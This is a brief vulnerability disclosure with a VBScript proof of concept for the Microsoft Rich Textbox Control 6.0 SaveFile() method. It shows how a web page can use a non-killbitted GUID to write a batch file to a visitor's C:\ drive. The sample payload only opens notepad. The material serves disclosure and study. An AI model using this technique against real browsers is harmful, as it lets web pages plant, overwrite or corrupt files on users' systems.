Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method

Reportedly, arbitrary commands can be executed via Microsoft Rich Textbox Control 6.0 (SP6).

Come to think of it, this PoC, or rather exploit, can run just about anything...

While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
works fine so it is possible, using the "SaveFile()" method,
to save the content of the rich textbox on a user's pc.
This can be used to save, overwrite and/or corrupt arbitrary
files on the system.

<script language='vbscript'>
  Sub tryMe
    test.Text = "@echo off" & vbCrLf & "cmd.exe /c notepad.exe" & vbCrLf & "echo Hello World!" & vbCrLf & "pause"
    test.SaveFile "C:\shinnai.bat", 1
    MsgBox "Exploit completed!"
  End Sub
</script>
